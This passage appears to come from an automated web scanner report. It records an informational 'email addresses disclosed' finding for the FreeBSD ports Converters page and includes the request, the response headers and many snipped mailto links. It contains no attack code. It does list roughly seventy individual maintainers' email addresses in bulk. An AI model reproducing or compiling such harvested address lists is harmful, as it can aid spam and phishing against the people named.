<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toxic@doobie.com">toxic@doobie.com</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:samm@os2.kiev.ua">samm@os2.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:f3cun3c02@sneakemail.com">f3cun3c02@sneakemail.com</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jaapb@kerguelen.org">jaapb@kerguelen.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sunpoet@FreeBSD.org">sunpoet@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sunpoet@FreeBSD.org">sunpoet@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nox@FreeBSD.org">nox@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ayu@commun.jp">ayu@commun.jp</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:martymac@FreeBSD.org">martymac@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:martymac@FreeBSD.org">martymac@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:f3cun3c02@sneakemail.com">f3cun3c02@sneakemail.com</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naylor.b.david@gmail.com">naylor.b.david@gmail.com</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sbrabez@gmail.com">sbrabez@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:afb@rpm5.org">afb@rpm5.org</A>
...[SNIP]...
<A HREF="mailto:nox@FreeBSD.org">nox@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:den@FreeBSD.org">den@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:davide.italiano@gmail.com">davide.italiano@gmail.com</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sec@42.org">sec@42.org</A>
...[SNIP]...
<A HREF="mailto:markand@malikania.fr">markand@malikania.fr</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:swhetzel@gmail.com">swhetzel@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jonny@jonny.eng.br">jonny@jonny.eng.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c-s@c-s.li">c-s@c-s.li</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yarodin@gmail.com">yarodin@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sunpoet@FreeBSD.org">sunpoet@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:onatan@gmail.com">onatan@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mark@mkproductions.org">mark@mkproductions.org</A>
...[SNIP]...
<A HREF="mailto:andreevmaxim@gmail.com">andreevmaxim@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...

24.310. http://www.freebsd.org/ports/converters.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/converters.html

Issue detail

The following email addresses were disclosed in the response:

M.Indlekofer@gmx.de
ache@FreeBSD.org
acm@FreeBSD.org
admin@lissyara.su
ale@FreeBSD.org
bland@FreeBSD.org
bsam@FreeBSD.org
buganini@gmail.com
c-s@c-s.li
catone@cpan.org
chifeng@gmail.com
chip-set@mail.ru
chris@FreeBSD.org
citric@cubicone.tmetic.com
clsung@FreeBSD.org
cm@therek.net
danfe@FreeBSD.org
darcsis@gmail.com
delphus@gmail.com
demon@FreeBSD.org
dgjohns@gmail.com
dinoex@FreeBSD.org
douglas@douglasthrift.net
edwin@mavetju.org
ehaupt@FreeBSD.org
g.veniamin@googlemail.com
garga@FreeBSD.org
gnome@FreeBSD.org
gslin@gslin.org
haskell@FreeBSD.org
ijliao@FreeBSD.org
kcwu@csie.org
keiichi@iijlab.net
knu@FreeBSD.org
kuriyama@FreeBSD.org
marck@FreeBSD.org
mhsin@mhsin.org
miwi@FreeBSD.org
mor@WhiteLuna.com
never@nevermind.kiev.ua
nikola.lecic@anthesphoria.net
nork@FreeBSD.org
obonilla@galileo.edu
olgeni@FreeBSD.org
pankov_p@mail.ru
pav@FreeBSD.org
pavel@ext.by
perl@FreeBSD.org
pluknet@gmail.com
ports@FreeBSD.org
ports@c0decafe.net
rafan@FreeBSD.org
reki@reki.ru
ruby@FreeBSD.org
samm@os2.kiev.ua
skv@FreeBSD.org
stas@FreeBSD.org
stb@lassitu.de
thierry@FreeBSD.org
tijl@coosemans.org
timur@FreeBSD.org
tobez@FreeBSD.org
tolid@plab.ku.dk
vanilla@FreeBSD.org
vlm@lionet.info
vovkasm@gmail.com
wen@FreeBSD.org

Request

GET /ports/converters.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1132075618"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 168789
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Converters</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="t
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlm@lionet.info">vlm@lionet.info</A>
...[SNIP]...
<A HREF="mailto:M.Indlekofer@gmx.de">M.Indlekofer@gmx.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nikola.lecic@anthesphoria.net">nikola.lecic@anthesphoria.net</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:M.Indlekofer@gmx.de">M.Indlekofer@gmx.de</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kcwu@csie.org">kcwu@csie.org</A>
...[SNIP]...
<A HREF="mailto:wen@FreeBSD.org">wen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:never@nevermind.kiev.ua">never@nevermind.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:chris@FreeBSD.org">chris@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:g.veniamin@googlemail.com">g.veniamin@googlemail.com</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:keiichi@iijlab.net">keiichi@iijlab.net</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pavel@ext.by">pavel@ext.by</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tijl@coosemans.org">tijl@coosemans.org</A>
...[SNIP]...
<A HREF="mailto:dgjohns@gmail.com">dgjohns@gmail.com</A>
...[SNIP]...
<A HREF="mailto:vanilla@FreeBSD.org">vanilla@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsam@FreeBSD.org">bsam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:never@nevermind.kiev.ua">never@nevermind.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:samm@os2.kiev.ua">samm@os2.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mor@WhiteLuna.com">mor@WhiteLuna.com</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pluknet@gmail.com">pluknet@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:timur@FreeBSD.org">timur@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:catone@cpan.org">catone@cpan.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:citric@cubicone.tmetic.com">citric@cubicone.tmetic.com</A>
...[SNIP]...
<A HREF="mailto:mhsin@mhsin.org">mhsin@mhsin.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:timur@FreeBSD.org">timur@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vovkasm@gmail.com">vovkasm@gmail.com</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:reki@reki.ru">reki@reki.ru</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:timur@FreeBSD.org">timur@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kuriyama@FreeBSD.org">kuriyama@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:timur@FreeBSD.org">timur@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tolid@plab.ku.dk">tolid@plab.ku.dk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:darcsis@gmail.com">darcsis@gmail.com</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wen@FreeBSD.org">wen@FreeBSD.org</A>
...[SNIP]...
